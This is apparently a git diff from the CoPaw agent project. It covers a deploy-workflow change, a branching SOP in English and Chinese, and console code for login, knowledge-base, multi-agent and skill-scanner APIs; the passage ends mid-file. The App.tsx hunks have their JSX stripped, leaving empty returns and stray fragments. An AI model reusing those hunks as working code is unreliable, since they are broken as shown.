diff --git a/.github/workflows/deploy-website.yml b/.github/workflows/deploy-website.yml
index e526801b3..1f78aa25e 100644
--- a/.github/workflows/deploy-website.yml
+++ b/.github/workflows/deploy-website.yml
@@ -3,14 +3,8 @@ name: Deploy website to GitHub Pages
 
 on:
-  push:
-    branches: [main]
-    paths:
-      - "website/**"
-      - "scripts/install.sh"
-      - "scripts/install.ps1"
-      - "scripts/install.bat"
-      - ".github/workflows/deploy-website.yml"
+  release:
+    types: [published]
   workflow_dispatch:
 
 permissions:
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index f92be2432..09e8c83ef 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -12,6 +12,8 @@ Thank you for your interest in contributing to CoPaw! CoPaw is an open-source **
 
 To keep collaboration smooth and maintain quality, please follow these guidelines.
 
+> Branching recommendation: read the [Dual-Mainline Branching SOP (Local Collaboration)](DEV_BRANCHING_SOP.md) first.
+
 ### 1. Check Existing Plans and Issues
 
 Before starting:
diff --git a/CONTRIBUTING_zh.md b/CONTRIBUTING_zh.md
index 8cb317cde..1ffb1e0eb 100644
--- a/CONTRIBUTING_zh.md
+++ b/CONTRIBUTING_zh.md
@@ -12,6 +12,8 @@
 
 为了保持协作顺畅并维护质量,请遵循以下指南。
 
+> 分支协作建议:请先阅读[双主线开发 SOP(本地协作版)](DEV_BRANCHING_SOP_zh.md)。
+
 ### 1. 检查现有计划和问题
 
 在开始之前:
diff --git a/DEV_BRANCHING_SOP.md b/DEV_BRANCHING_SOP.md
new file mode 100644
index 000000000..27bea2ff2
--- /dev/null
+++ b/DEV_BRANCHING_SOP.md
@@ -0,0 +1,80 @@
+# CoPaw Dual-Mainline Branching SOP (Local Collaboration)
+
+This SOP standardizes local dual-mainline workflows and prevents accidental merges into the wrong mainline.
+
+## 1. Branch Roles
+
+- upstream/main: upstream source-of-truth mainline for sync and upstream PR baselines.
+- fork/main: local development mainline where features are merged and validated first.
+- main (local): choose exactly one model and keep it consistent.
+  - Model A (recommended): upstream mirror line.
+  - Model B: local release integration line.
+
+Important: The team must align on what local main means before daily work.
+
+## 2. Standard Development Flow
+
+1. Refresh base lines
+- git fetch --all --prune
+- git checkout fork/main
+- git merge --ff-only upstream/main
+
+2. Create feature branch
+- git checkout -b feat/upstream/ fork/main
+
+3. Develop and commit
+- Follow Conventional Commits.
+- Pass local gates before push/PR (pre-commit, pytest).
+
+4. First merge stage (required)
+- Merge feature into fork/main first.
+- Commands:
+  - git checkout fork/main
+  - git merge --no-ff feat/upstream/
+
+5. Second merge stage (optional, policy-based)
+- If main is a local release integration line: merge fork/main into main.
+- If main is an upstream mirror line: do not merge fork/main directly into main; open PR to upstream/main instead.
+
+## 3. PR Target Mapping
+
+- For upstream contribution:
+  - source: feat/upstream/ (or cleaned equivalent)
+  - target: upstream/main
+- For local fork integration:
+  - source: feat/upstream/
+  - target: fork/main
+
+## 4. Pre-Merge Checklist
+
+- Working tree is clean (git status has no pending changes).
+- Target branch is correct (fork/main or main).
+- Local mainline role is explicit (mirror vs integration).
+- Diff/log range is explainable (git log / git diff).
+- Required tests have passed (at least local gates).
+
+## 5. Command Templates
+
+### 5.1 Merge into development mainline first (fork/main)
+
+- git checkout fork/main
+- git merge --no-ff feat/upstream/knowledge-layer-mvp-sop-cognee
+
+### 5.2 Merge into local mainline (only when main = integration line)
+
+- git checkout main
+- git merge --no-ff fork/main
+
+## 6. Common Pitfalls
+
+- Pitfall 1: Merge feature directly into main after implementation.
+  - Risk: pollutes mirror semantics if main is meant to track upstream.
+- Pitfall 2: Let fork/main drift too far from upstream/main.
+  - Risk: conflict debt accumulates and PR review cost rises.
+- Pitfall 3: Merge to mainline before local gates pass.
+  - Risk: unstable mainline and expensive rollback.
+
+## 7. Relation to CONTRIBUTING
+
+- This SOP complements, not replaces, CONTRIBUTING rules.
+- Keep enforcing Conventional Commits, PR title format, pre-commit and test gates.
diff --git a/DEV_BRANCHING_SOP_zh.md b/DEV_BRANCHING_SOP_zh.md
new file mode 100644
index 000000000..46a0a8684
--- /dev/null
+++ b/DEV_BRANCHING_SOP_zh.md
@@ -0,0 +1,80 @@
+# CoPaw 双主线开发 SOP(本地协作版)
+
+本文用于规范本地双主线协作,避免 feature 直接误合到错误主线。
+
+## 1. 分支角色
+
+- upstream/main:上游事实主线,仅用于同步上游状态、构建上游 PR 基线。
+- fork/main:本地开发主线,功能先合入这里并完成验证。
+- main(本地):建议固定为以下两种之一。
+  - 方案 A(推荐):上游镜像线。尽量保持与 upstream/main 对齐。
+  - 方案 B:本地发布整合线。承接 fork/main,服务本地发布。
+
+注意:项目内必须先统一 main 的定位,避免不同成员按不同语义操作。
+
+## 2. 标准开发路径
+
+1. 更新基线
+- git fetch --all --prune
+- git checkout fork/main
+- git merge --ff-only upstream/main
+
+2. 创建功能分支
+- git checkout -b feat/upstream/ fork/main
+
+3. 开发与提交
+- 按 Conventional Commits 提交。
+- push/提 PR 前通过本地门禁(pre-commit、pytest)。
+
+4. 第一段合并(必须)
+- 目标:先合入 fork/main。
+- 命令:
+  - git checkout fork/main
+  - git merge --no-ff feat/upstream/
+
+5. 第二段合并(按需)
+- 如果 main 是“本地发布整合线”:再将 fork/main 合入 main。
+- 如果 main 是“上游镜像线”:不要把 fork/main 直接合入 main;改为对 upstream/main 提 PR。
+
+## 3. PR 与分支对应关系
+
+- 面向 upstream:
+  - 源分支:feat/upstream/(或清理后的等价分支)
+  - 目标分支:upstream/main
+- 面向 fork 内部整合:
+  - 源分支:feat/upstream/
+  - 目标分支:fork/main
+
+## 4. 合并前检查清单
+
+- 当前工作区干净(git status 无未提交改动)。
+- 当前目标分支正确(fork/main 或 main)。
+- 明确 main 当前语义(上游镜像线 / 本地发布整合线)。
+- 确认 feature 与目标分支差异范围可解释(git log/ git diff)。
+- 必要测试已通过(至少本地门禁)。
+
+## 5. 推荐命令模板
+
+### 5.1 先合开发主线(fork/main)
+
+- git checkout fork/main
+- git merge --no-ff feat/upstream/knowledge-layer-mvp-sop-cognee
+
+### 5.2 再合本地 main(仅当 main=本地发布整合线)
+
+- git checkout main
+- git merge --no-ff fork/main
+
+## 6. 常见误区
+
+- 误区 1:feature 完成后直接合 main。
+  - 风险:若 main 是上游镜像线,会污染镜像语义。
+- 误区 2:fork/main 与 upstream/main 长期不对齐。
+  - 风险:后续冲突集中爆发,PR 审核成本升高。
+- 误区 3:未先做门禁验证就推进主线合并。
+  - 风险:主线不稳定,后续回滚成本上升。
+
+## 7. 与贡献规范的关系
+
+- 本 SOP 不替代 CONTRIBUTING 中的提交与质量规范。
+- 所有分支流程仍需遵守:Conventional Commits、PR 标题规范、pre-commit 与测试门禁。
diff --git a/console/public/copaw-dark.png b/console/public/copaw-dark.png
new file mode 100644
index 000000000..3dd738377
Binary files /dev/null and b/console/public/copaw-dark.png differ
diff --git a/console/public/dark-logo.png b/console/public/dark-logo.png
new file mode 100644
index 000000000..dc9daa85a
Binary files /dev/null and b/console/public/dark-logo.png differ
diff --git a/console/src/App.tsx b/console/src/App.tsx
index ed39545a0..ef0d5496b 100644
--- a/console/src/App.tsx
+++ b/console/src/App.tsx
@@ -1,6 +1,6 @@
 import { createGlobalStyle } from "antd-style";
 import { ConfigProvider, bailianTheme } from "@agentscope-ai/design";
-import { BrowserRouter } from "react-router-dom";
+import { BrowserRouter, Routes, Route, Navigate } from "react-router-dom";
 import { useEffect, useState } from "react";
 import { useTranslation } from "react-i18next";
 import zhCN from "antd/locale/zh_CN";
@@ -8,11 +8,16 @@ import enUS from "antd/locale/en_US";
 import jaJP from "antd/locale/ja_JP";
 import ruRU from "antd/locale/ru_RU";
 import type { Locale } from "antd/es/locale";
+import { theme as antdTheme } from "antd";
 import dayjs from "dayjs";
 import "dayjs/locale/zh-cn";
 import "dayjs/locale/ja";
 import "dayjs/locale/ru";
 import MainLayout from "./layouts/MainLayout";
+import { ThemeProvider, useTheme } from "./contexts/ThemeContext";
+import LoginPage from "./pages/Login";
+import { authApi } from "./api/modules/auth";
+import { getApiUrl, getApiToken, clearAuthToken } from "./api/config";
 import "./styles/layout.css";
 import "./styles/form-override.css";
@@ -37,8 +42,71 @@ const GlobalStyle = createGlobalStyle`
 }
 `;
 
-function App() {
+function AuthGuard({ children }: { children: React.ReactNode }) {
+  const [status, setStatus] = useState<"loading" | "auth-required" | "ok">(
+    "loading",
+  );
+
+  useEffect(() => {
+    let cancelled = false;
+    (async () => {
+      try {
+        const res = await authApi.getStatus();
+        if (cancelled) return;
+        if (!res.enabled) {
+          setStatus("ok");
+          return;
+        }
+        const token = getApiToken();
+        if (!token) {
+          setStatus("auth-required");
+          return;
+        }
+        try {
+          const r = await fetch(getApiUrl("/auth/verify"), {
+            headers: { Authorization: `Bearer ${token}` },
+          });
+          if (cancelled) return;
+          if (r.ok) {
+            setStatus("ok");
+          } else {
+            clearAuthToken();
+            setStatus("auth-required");
+          }
+        } catch {
+          if (!cancelled) {
+            clearAuthToken();
+            setStatus("auth-required");
+          }
+        }
+      } catch {
+        if (!cancelled) setStatus("ok");
+      }
+    })();
+    return () => {
+      cancelled = true;
+    };
+  }, []);
+
+  if (status === "loading") return null;
+  if (status === "auth-required")
+    return (
+
+    );
+  return <>{children}</>;
+}
+
+function getRouterBasename(pathname: string): string | undefined {
+  return /^\/console(?:\/|$)/.test(pathname) ? "/console" : undefined;
+}
+
+function AppInner() {
+  const basename = getRouterBasename(window.location.pathname);
   const { i18n } = useTranslation();
+  const { isDark } = useTheme();
   const lang = i18n.resolvedLanguage || i18n.language || "en";
   const [antdLocale, setAntdLocale] = useState(
     antdLocaleMap[lang] ?? enUS,
@@ -61,18 +129,42 @@
   }, [i18n]);
 
   return (
-
+
-
+
+          } />
+
+
+
+            }
+          />
+
+
   );
 }
 
+function App() {
+  return (
+
+
+
+  );
+}
+
 export default App;
diff --git a/console/src/api/config.ts b/console/src/api/config.ts
index d13464fa5..1dbe8d17e 100644
--- a/console/src/api/config.ts
+++ b/console/src/api/config.ts
@@ -1,6 +1,8 @@
 declare const BASE_URL: string;
 declare const TOKEN: string;
 
+const AUTH_TOKEN_KEY = "copaw_auth_token";
+
 /**
  * Get the full API URL with /api prefix
  * @param path - API path (e.g., "/models", "/skills")
@@ -14,9 +16,26 @@ export function getApiUrl(path: string): string {
 }
 
 /**
- * Get the API token
+ * Get the API token - checks localStorage first (auth login),
+ * then falls back to the build-time TOKEN constant.
  * @returns API token string or empty string
  */
 export function getApiToken(): string {
+  const stored = localStorage.getItem(AUTH_TOKEN_KEY);
+  if (stored) return stored;
   return typeof TOKEN !== "undefined" ? TOKEN : "";
 }
+
+/**
+ * Store the auth token in localStorage after login.
+ */
+export function setAuthToken(token: string): void {
+  localStorage.setItem(AUTH_TOKEN_KEY, token);
+}
+
+/**
+ * Remove the auth token from localStorage (logout / 401).
+ */
+export function clearAuthToken(): void {
+  localStorage.removeItem(AUTH_TOKEN_KEY);
+}
diff --git a/console/src/api/index.ts b/console/src/api/index.ts
index fc3515551..116d809b6 100644
--- a/console/src/api/index.ts
+++ b/console/src/api/index.ts
@@ -7,12 +7,14 @@ export { getApiUrl, getApiToken } from "./config";
 import { rootApi } from "./modules/root";
 import { channelApi } from "./modules/channel";
 import { heartbeatApi } from "./modules/heartbeat";
+import { knowledgeApi } from "./modules/knowledge";
 import { cronJobApi } from "./modules/cronjob";
 import { chatApi, sessionApi } from "./modules/chat";
 import { envApi } from "./modules/env";
 import { providerApi } from "./modules/provider";
 import { skillApi } from "./modules/skill";
 import { agentApi } from "./modules/agent";
+import { agentsApi } from "./modules/agents";
 import { workspaceApi } from "./modules/workspace";
 import { localModelApi } from "./modules/localModel";
 import { ollamaModelApi } from "./modules/ollamaModel";
@@ -20,6 +22,7 @@ import { mcpApi } from "./modules/mcp";
 import { tokenUsageApi } from "./modules/tokenUsage";
 import { toolsApi } from "./modules/tools";
 import { securityApi } from "./modules/security";
+import { userTimezoneApi } from "./modules/userTimezone";
 
 export const api = {
   // Root
@@ -31,6 +34,9 @@
   // Heartbeat
   ...heartbeatApi,
 
+  // Knowledge
+  ...knowledgeApi,
+
   // Cron Jobs
   ...cronJobApi,
 
@@ -71,6 +77,12 @@
   // Security
   ...securityApi,
+
+  // User Timezone
+  ...userTimezoneApi,
 };
 
 export default api;
+
+// Export individual APIs for direct access
+export { agentsApi };
diff --git a/console/src/api/modules/agent.ts b/console/src/api/modules/agent.ts
index 8e09a5f9a..e3d7a24ab 100644
--- a/console/src/api/modules/agent.ts
+++ b/console/src/api/modules/agent.ts
@@ -41,4 +41,45 @@ export const agentApi = {
       method: "PUT",
       body: JSON.stringify({ language }),
     }),
+
+  getAudioMode: () => request<{ audio_mode: string }>("/agent/audio-mode"),
+
+  updateAudioMode: (audio_mode: string) =>
+    request<{ audio_mode: string }>("/agent/audio-mode", {
+      method: "PUT",
+      body: JSON.stringify({ audio_mode }),
+    }),
+
+  getTranscriptionProviders: () =>
+    request<{
+      providers: { id: string; name: string; available: boolean }[];
+      configured_provider_id: string;
+    }>("/agent/transcription-providers"),
+
+  updateTranscriptionProvider: (provider_id: string) =>
+    request<{ provider_id: string }>("/agent/transcription-provider", {
+      method: "PUT",
+      body: JSON.stringify({ provider_id }),
+    }),
+
+  getTranscriptionProviderType: () =>
+    request<{ transcription_provider_type: string }>(
+      "/agent/transcription-provider-type",
+    ),
+
+  updateTranscriptionProviderType: (transcription_provider_type: string) =>
+    request<{ transcription_provider_type: string }>(
+      "/agent/transcription-provider-type",
+      {
+        method: "PUT",
+        body: JSON.stringify({ transcription_provider_type }),
+      },
+    ),
+
+  getLocalWhisperStatus: () =>
+    request<{
+      available: boolean;
+      ffmpeg_installed: boolean;
+      whisper_installed: boolean;
+    }>("/agent/local-whisper-status"),
 };
diff --git a/console/src/api/modules/agents.ts b/console/src/api/modules/agents.ts
new file mode 100644
index 000000000..0d1d1876d
--- /dev/null
+++ b/console/src/api/modules/agents.ts
@@ -0,0 +1,60 @@
+import { request } from "../request";
+import type {
+  AgentListResponse,
+  AgentProfileConfig,
+  CreateAgentRequest,
+  AgentProfileRef,
+} from "../types/agents";
+import type { MdFileInfo, MdFileContent } from "../types/workspace";
+
+// Multi-agent management API
+export const agentsApi = {
+  // List all agents
+  listAgents: () => request("/agents"),
+
+  // Get agent details
+  getAgent: (agentId: string) =>
+    request(`/agents/${agentId}`),
+
+  // Create new agent
+  createAgent: (agent: CreateAgentRequest) =>
+    request("/agents", {
+      method: "POST",
+      body: JSON.stringify(agent),
+    }),
+
+  // Update agent configuration
+  updateAgent: (agentId: string, agent: AgentProfileConfig) =>
+    request(`/agents/${agentId}`, {
+      method: "PUT",
+      body: JSON.stringify(agent),
+    }),
+
+  // Delete agent
+  deleteAgent: (agentId: string) =>
+    request<{ success: boolean; agent_id: string }>(`/agents/${agentId}`, {
+      method: "DELETE",
+    }),
+
+  // Agent workspace files
+  listAgentFiles: (agentId: string) =>
+    request(`/agents/${agentId}/files`),
+
+  readAgentFile: (agentId: string, filename: string) =>
+    request(
+      `/agents/${agentId}/files/${encodeURIComponent(filename)}`,
+    ),
+
+  writeAgentFile: (agentId: string, filename: string, content: string) =>
+    request<{ written: boolean; filename: string }>(
+      `/agents/${agentId}/files/${encodeURIComponent(filename)}`,
+      {
+        method: "PUT",
+        body: JSON.stringify({ content }),
+      },
+    ),
+
+  // Agent memory files
+  listAgentMemory: (agentId: string) =>
+    request(`/agents/${agentId}/memory`),
+};
diff --git a/console/src/api/modules/auth.ts b/console/src/api/modules/auth.ts
new file mode 100644
index 000000000..19da57f37
--- /dev/null
+++ b/console/src/api/modules/auth.ts
@@ -0,0 +1,49 @@
+import { getApiUrl } from "../config";
+
+export interface LoginResponse {
+  token: string;
+  username: string;
+  message?: string;
+}
+
+export interface AuthStatusResponse {
+  enabled: boolean;
+  has_users: boolean;
+}
+
+export const authApi = {
+  login: async (username: string, password: string): Promise<LoginResponse> => {
+    const res = await fetch(getApiUrl("/auth/login"), {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify({ username, password }),
+    });
+    if (!res.ok) {
+      const err = await res.json().catch(() => ({}));
+      throw new Error(err.detail || "Login failed");
+    }
+    return res.json();
+  },
+
+  register: async (
+    username: string,
+    password: string,
+  ): Promise<LoginResponse> => {
+    const res = await fetch(getApiUrl("/auth/register"), {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify({ username, password }),
+    });
+    if (!res.ok) {
+      const err = await res.json().catch(() => ({}));
+      throw new Error(err.detail || "Registration failed");
+    }
+    return res.json();
+  },
+
+  getStatus: async (): Promise<AuthStatusResponse> => {
+    const res = await fetch(getApiUrl("/auth/status"));
+    if (!res.ok) throw new Error("Failed to check auth status");
+    return res.json();
+  },
+};
diff --git a/console/src/api/modules/chat.ts b/console/src/api/modules/chat.ts
index 422f12fca..7d354a29a 100644
--- a/console/src/api/modules/chat.ts
+++ b/console/src/api/modules/chat.ts
@@ -43,6 +43,13 @@ export const chatApi = {
       body: JSON.stringify(chatIds),
     },
   ),
+
+  /** Stop a running console chat (only stop when user clicks stop). chat_id = ChatSpec.id */
+  stopConsoleChat: (chatId: string) =>
+    request<{ stopped: boolean }>(
+      `/console/chat/stop?chat_id=${encodeURIComponent(chatId)}`,
+      { method: "POST" },
+    ),
 };
 
 export const sessionApi = {
diff --git a/console/src/api/modules/knowledge.ts b/console/src/api/modules/knowledge.ts
new file mode 100644
index 000000000..65bc64836
--- /dev/null
+++ b/console/src/api/modules/knowledge.ts
@@ -0,0 +1,199 @@
+import { getApiUrl } from "../config";
+import { request } from "../request";
+import type {
+  KnowledgeBulkIndexResult,
+  KnowledgeConfig,
+  KnowledgeHistoryBackfillRunResponse,
+  KnowledgeHistoryBackfillStatus,
+  KnowledgeRestoreResponse,
+  KnowledgeIndexResult,
+  KnowledgeClearResponse,
+  KnowledgeSearchResponse,
+  KnowledgeSourceContent,
+  KnowledgeSourceSpec,
+  KnowledgeSourcesResponse,
+} from "../types";
+
+export const knowledgeApi = {
+  getKnowledgeConfig: () => request("/knowledge/config"),
+
+  updateKnowledgeConfig: (payload: KnowledgeConfig) =>
+    request("/knowledge/config", {
+      method: "PUT",
+      body: JSON.stringify(payload),
+    }),
+
+  listKnowledgeSources: () =>
+    request("/knowledge/sources"),
+
+  upsertKnowledgeSource: (payload: KnowledgeSourceSpec) =>
+    request("/knowledge/sources", {
+      method: "PUT",
+      body: JSON.stringify(payload),
+    }),
+
+  uploadKnowledgeFile: async (sourceId: string, file: File) => {
+    const formData = new FormData();
+    formData.append("source_id", sourceId);
+    formData.append("file", file);
+
+    const response = await fetch(getApiUrl("/knowledge/upload/file"), {
+      method: "POST",
+      body: formData,
+    });
+    if (!response.ok) {
+      const text = await response.text().catch(() => "");
+      throw new Error(
+        `Upload failed: ${response.status} ${response.statusText}${
+          text ? ` - ${text}` : ""
+        }`,
+      );
+    }
+    return (await response.json()) as { location: string; filename: string };
+  },
+
+  uploadKnowledgeDirectory: async (
+    sourceId: string,
+    files: Array<{ file: File; relativePath: string }>,
+  ) => {
+    const formData = new FormData();
+    formData.append("source_id", sourceId);
+    files.forEach(({ file, relativePath }) => {
+      formData.append("files", file);
+      formData.append("relative_paths", relativePath);
+    });
+
+    const response = await fetch(getApiUrl("/knowledge/upload/directory"), {
+      method: "POST",
+      body: formData,
+    });
+    if (!response.ok) {
+      const text = await response.text().catch(() => "");
+      throw new Error(
+        `Upload failed: ${response.status} ${response.statusText}${
+          text ? ` - ${text}` : ""
+        }`,
+      );
+    }
+    return (await response.json()) as { location: string; file_count: number };
+  },
+
+  deleteKnowledgeSource: (sourceId: string) =>
+    request<{ deleted: boolean; source_id: string }>(
+      `/knowledge/sources/${encodeURIComponent(sourceId)}`,
+      {
+        method: "DELETE",
+      },
+    ),
+
+  clearKnowledge: (params?: { removeSources?: boolean }) =>
+    request(
+      `/knowledge/clear?confirm=true&remove_sources=${
+        params?.removeSources === false ? "false" : "true"
+      }`,
+      {
+        method: "DELETE",
+      },
+    ),
+
+  indexKnowledgeSource: (sourceId: string) =>
+    request(
+      `/knowledge/sources/${encodeURIComponent(sourceId)}/index`,
+      {
+        method: "POST",
+      },
+    ),
+
+  indexAllKnowledgeSources: () =>
+    request("/knowledge/index", {
+      method: "POST",
+    }),
+
+  getKnowledgeHistoryBackfillStatus: () =>
+    request("/knowledge/history-backfill/status"),
+
+  runKnowledgeHistoryBackfillNow: () =>
+    request("/knowledge/history-backfill/run", {
+      method: "POST",
+    }),
+
+  getKnowledgeSourceContent: (sourceId: string) =>
+    request(
+      `/knowledge/sources/${encodeURIComponent(sourceId)}/content`,
+    ),
+
+  searchKnowledge: (params: {
+    query: string;
+    limit?: number;
+    sourceIds?: string[];
+    sourceTypes?: string[];
+  }) => {
+    const searchParams = new URLSearchParams({
+      q: params.query,
+      limit: String(params.limit ?? 10),
+    });
+    if (params.sourceIds?.length) {
+      searchParams.set("source_ids", params.sourceIds.join(","));
+    }
+    if (params.sourceTypes?.length) {
+      searchParams.set("source_types", params.sourceTypes.join(","));
+    }
+    return request(
+      `/knowledge/search?${searchParams.toString()}`,
+    );
+  },
+
+  downloadKnowledgeBackup: async (): Promise<Blob> => {
+    const response = await fetch(getApiUrl("/knowledge/backup"), {
+      method: "GET",
+    });
+    if (!response.ok) {
+      throw new Error(
+        `Knowledge backup failed: ${response.status} ${response.statusText}`,
+      );
+    }
+    return await response.blob();
+  },
+
+  downloadKnowledgeSourceBackup: async (sourceId: string): Promise<Blob> => {
+    const response = await fetch(
+      getApiUrl(`/knowledge/backup/${encodeURIComponent(sourceId)}`),
+      {
+        method: "GET",
+      },
+    );
+    if (!response.ok) {
+      throw new Error(
+        `Knowledge source backup failed: ${response.status} ${response.statusText}`,
+      );
+    }
+    return await response.blob();
+  },
+
+  restoreKnowledgeBackup: async (
+    file: File,
+    replaceExisting = true,
+  ): Promise<KnowledgeRestoreResponse> => {
+    const formData = new FormData();
+    formData.append("file", file);
+
+    const response = await fetch(
+      getApiUrl(
+        `/knowledge/restore?replace_existing=${replaceExisting ? "true" : "false"}`,
+      ),
+      {
+        method: "POST",
+        body: formData,
+      },
+    );
+    if (!response.ok) {
+      const text = await response.text().catch(() => "");
+      throw new Error(
+        `Knowledge restore failed: ${response.status} ${response.statusText}${
+          text ? ` - ${text}` : ""
+        }`,
+      );
+    }
+    return (await response.json()) as KnowledgeRestoreResponse;
+  },
+};
\ No newline at end of file
diff --git a/console/src/api/modules/security.ts b/console/src/api/modules/security.ts
index 4332fe37b..2a6580391 100644
--- a/console/src/api/modules/security.ts
+++ b/console/src/api/modules/security.ts
@@ -20,7 +20,51 @@ export interface ToolGuardConfig {
   disabled_rules: string[];
 }
 
+// ── Skill Scanner types ────────────────────────────────────────────
+
+export interface SkillScannerWhitelistEntry {
+  skill_name: string;
+  content_hash: string;
+  added_at: string;
+}
+
+export type SkillScannerMode = "block" | "warn" | "off";
+
+export interface SkillScannerConfig {
+  mode: SkillScannerMode;
+  timeout: number;
+  whitelist: SkillScannerWhitelistEntry[];
+}
+
+export interface BlockedSkillFinding {
+  severity: string;
+  title: string;
+  description: string;
+  file_path: string;
+  line_number: number | null;
+  rule_id: string;
+}
+
+export interface BlockedSkillRecord {
+  skill_name: string;
+  blocked_at: string;
+  max_severity: string;
+  findings: BlockedSkillFinding[];
+  content_hash: string;
+  action: "blocked" | "warned";
+}
+
+export interface SecurityScanErrorResponse {
+  type: "security_scan_failed";
+  detail: string;
+  skill_name: string;
+  max_severity: string;
+  findings: BlockedSkillFinding[];
+}
+
 export const securityApi = {
+  // ── Tool Guard ──────────────────────────────────────────────────
+
   getToolGuard: () => request("/config/security/tool-guard"),
 
   updateToolGuard: (body: ToolGuardConfig) =>
@@ -31,4 +75,52 @@
   getBuiltinRules: () =>
     request("/config/security/tool-guard/builtin-rules"),
+
+  // ── Skill Scanner ───────────────────────────────────────────────
+
+  getSkillScanner: () =>
+    request("/config/security/skill-scanner"),
+
+  updateSkillScanner: (body: SkillScannerConfig) =>
+    request("/config/security/skill-scanner", {
+      method: "PUT",
+      body: JSON.stringify(body),
+    }),
+
+  getBlockedHistory: () =>
+    request(
+      "/config/security/skill-scanner/blocked-history",
+    ),
+
+  clearBlockedHistory: () =>
+    request<{ cleared: boolean }>(
+      "/config/security/skill-scanner/blocked-history",
+      { method: "DELETE" },
+    ),
+
+  removeBlockedEntry: (index: number) =>
+    request<{ removed: boolean }>(
+      `/config/security/skill-scanner/blocked-history/${index}`,
+      { method: "DELETE" },
+    ),
+
+  addToWhitelist: (skillName: string, contentHash: string = "") =>
+    request<{ whitelisted: boolean; skill_name: string }>(
+      "/config/security/skill-scanner/whitelist",
+      {
+        method: "POST",
+        body: JSON.stringify({
+          skill_name: skillName,
+          content_hash: contentHash,
+        }),
+      },
+    ),
+
+  removeFromWhitelist: (skillName: string) =>
+    request<{ removed: boolean; skill_name: string }>(
+      `/config/security/skill-scanner/whitelist/${encodeURIComponent(
+        skillName,
+      )}`,
+      { method: "DELETE" },
+    ),
 };
diff --git a/console/src/api/modules/userTimezone.ts b/console/src/api/modules/userTimezone.ts
new file mode 100644
index 000000000..dc56d055f
--- /dev/null
+++ b/console/src/api/modules/userTimezone.ts
@@ -0,0 +1,15 @@
+import { request } from "../request";
+
+export interface UserTimezoneConfig {
+  timezone: string;
+}
+
+export const userTimezoneApi = {
+  getUserTimezone: () => request("/config/user-timezone"),
+
+  updateUserTimezone: (timezone: string) =>
+    request("/config/user-timezone", {
+      method: "PUT",
+      body: JSON.stringify({ timezone }),
+    }),
+};
diff --git a/console/src/api/request.ts b/console/src/api/request.ts
index 35d1cf471..2e190f5b8 100644
--- a/console/src/api/request.ts
+++ b/console/src/api/request.ts
@@ -1,4 +1,4 @@
-import { getApiUrl, getApiToken } from "./config";
+import { getApiUrl, getApiToken, clearAuthToken } from "./config";
 
 function buildHeaders(method?: string, extra?: HeadersInit): Headers {
   // Normalize extra to a Headers instance for consistent handling
@@ -18,6 +18,21 @@
     headers.set("Authorization", `Bearer ${token}`);
   }
 
+  // Add selected agent ID to all requests (for multi-agent support)
+  try {
+    const agentStorage = localStorage.getItem("copaw-agent-storage");
+    if (agentStorage) {
+      const parsed = JSON.parse(agentStorage);
+      const selectedAgent = parsed?.state?.selectedAgent;
+      if (selectedAgent) {
+        headers.set("X-Agent-Id", selectedAgent);
+      }
+    }
+  } catch (error) {
+    // Ignore localStorage errors
+    console.warn("Failed to get selected agent from storage:", error);
+  }
+
   return headers;
 }
 
@@ -35,6 +50,15 @@ export async function request(
   });
 
   if (!response.ok) {
+    // Handle 401: clear token and redirect to login
+    if (response.status === 401) {
+      clearAuthToken();
+      if (window.location.pathname !== "/login") {
+        window.location.href = "/login";
+      }
+      throw new Error("Not authenticated");
+    }
+
     const text = await response.text().catch(() => "");
     throw new Error(
       `Request failed: ${response.status} ${response.statusText}${
diff --git a/console/src/api/types/agent.ts b/console/src/api/types/agent.ts
index 5b1611567..8406fba86 100644
--- a/console/src/api/types/agent.ts
+++ b/console/src/api/types/agent.ts
@@ -13,4 +13,10 @@ export interface AgentsRunningConfig {
   memory_reserve_ratio: number;
   enable_tool_result_compact: boolean;
   tool_result_compact_keep_n: number;
+  knowledge_enabled: boolean;
+  knowledge_auto_collect_chat_files: boolean;
+  knowledge_auto_collect_chat_urls: boolean;
+  knowledge_auto_collect_long_text: boolean;
+  knowledge_long_text_min_chars: number;
+  knowledge_chunk_size: number;
 }
diff --git a/console/src/api/types/agents.ts b/console/src/api/types/agents.ts
new file mode 100644
index 000000000..abc80a74e
--- /dev/null
+++ b/console/src/api/types/agents.ts
@@ -0,0 +1,39 @@
+// Multi-agent management types
+
+export interface AgentSummary {
+  id: string;
+  name: string;
+  description: string;
+  workspace_dir: string;
+}
+
+export interface AgentListResponse {
+  agents: AgentSummary[];
+}
+
+export interface AgentProfileConfig {
+  id: string;
+  name: string;
+  description?: string;
+  workspace_dir?: string;
+  channels?: unknown;
+  mcp?: unknown;
+  heartbeat?: unknown;
+  running?: unknown;
+  llm_routing?: unknown;
+  system_prompt_files?: string[];
+  tools?: unknown;
+  security?: unknown;
+}
+
+export interface CreateAgentRequest {
+  name: string;
+  description?: string;
+  workspace_dir?: string;
+  language?: string;
+}
+
+export interface AgentProfileRef {
+  id: string;
+  workspace_dir: string;
+}
diff --git a/console/src/api/types/channel.ts b/console/src/api/types/channel.ts
index 8c96659cd..67ab7d0ba 100644
--- a/console/src/api/types/channel.ts
+++ b/console/src/api/types/channel.ts
@@ -23,6 +23,10 @@ export interface DiscordConfig extends BaseChannelConfig {
 export interface DingTalkConfig extends BaseChannelConfig {
   client_id: string;
   client_secret: string;
+  message_type: string;
+  card_template_id: string;
+  card_template_key: string;
+  robot_code: string;
 }
 
 export interface FeishuConfig extends BaseChannelConfig {
@@ -81,6 +85,14 @@ export interface VoiceChannelConfig extends BaseChannelConfig {
   welcome_greeting: string;
 }
 
+export interface XiaoYiConfig extends BaseChannelConfig {
+  ak: string;
+  sk: string;
+  agent_id: string;
+  ws_url: string;
+  task_timeout_ms?: number;
+}
+
 export interface ChannelConfig {
   imessage: IMessageChannelConfig;
   discord: DiscordConfig;
@@ -92,6 +104,7 @@
   matrix: MatrixConfig;
   console: ConsoleConfig;
   voice: VoiceChannelConfig;
+  xiaoyi: XiaoYiConfig;
 }
 
 export type SingleChannelConfig =
@@ -104,4 +117,5 @@ export type SingleChannelConfig =
   | TelegramConfig
   | MQTTConfig
   | MatrixConfig
-  | VoiceChannelConfig;
+  | VoiceChannelConfig
+  | XiaoYiConfig;
diff --git a/console/src/api/types/chat.ts b/console/src/api/types/chat.ts
index 5846b0686..9b7610269 100644
--- a/console/src/api/types/chat.ts
